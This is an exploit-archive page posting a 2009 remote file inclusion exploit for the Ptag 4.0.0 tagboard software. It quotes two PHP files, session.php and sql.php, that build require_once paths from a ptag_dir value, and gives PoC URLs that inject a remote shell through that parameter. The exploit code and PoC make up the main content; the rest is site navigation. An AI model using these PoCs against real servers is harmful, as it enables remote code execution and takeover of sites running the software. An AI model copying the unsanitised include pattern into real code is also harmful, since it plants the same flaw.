Ptag 4.0.0 Remote File Inclusion

Ptag 4.0.0 Remote File Inclusion: Posted Dec 21, 2009; Authored by cr4wl3r; Ptag versions 4.0.0 and below suffer from multiple remote file inclusion vulnerabilities.; tags | exploit, remote, vulnerability, code execution, file inclusion; SHA-256 | ab2966166dab54c81726f7a3a4db3089a41f481cde779c24a2822c0a50749911; Download | Favorite | View

Ptag 4.0.0 Remote File Inclusion

##################################################################
## Exploit Title: Ptag <= 4.0.0 Multiple RFI Exploit            ##
## Date: 19-12-2009                                             ##
## Author: cr4wl3r                                              ##
## Software Link: http://sourceforge.net/projects/ptag/         ##
## Version: N/A                                                 ##
## Tested on: GNU/LINUX                                         ##
##################################################################
 
 
~ Code [session.php]
 
<?php
//Plottable Tagboard Systems Version 4.0.0 - ROLAND
//Session handling File
 
require_once(ptag_dir."lib/php/crossSession.php");
class ptag_session extends crossSession{
    public function __construct(){
        global $ptag_sql;
        $this -> sql_table = ptag_prefix."session";
        $this -> cookie_name = ptag_prefix."session";
         
        //If RSS mode, switch session to non-viewed tracker.
        if (ptag_output == "rss"){
            parent::__construct($ptag_sql, sha1(""));
        }
        else{
            parent::__construct($ptag_sql);
        }
    }
}
?>
 
~ PoC
 
[Ptag_path]/lib/session.php?ptag_dir=[Shell]
 
 
 
 
~ Code [sql.php]
 
<?php
//Plottable Tagboard Systems Version 4.0.0 - ROLAND
//Extending MySQL class
 
require_once(ptag_dir."lib/php/ezmySQL.php");
class ptag_sql extends ezmySQL{
 
    public function __construct(){
        parent::__construct(ptag_mysql_host, ptag_mysql_user, ptag_mysql_pass, ptag_mysql_db);
    }
     
    protected function error_handler($err){
        $error = "A MySQL error has occured: (".$err["errno"].") ".$err["error"]." when executing the query: ".$err["query"];
         
        return ptag_exception::handle_error($error, $err["line"], $err["file"], $err["class"], $err["method"]);
    }
}
?>
 
 
~ PoC
 
[Ptag_path]/lib/sql.php?ptag_dir=[Shell]

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Ptag 4.0.0 Remote File Inclusion

Ptag 4.0.0 Remote File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Ptag 4.0.0 Remote File Inclusion

Share This

Ptag 4.0.0 Remote File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems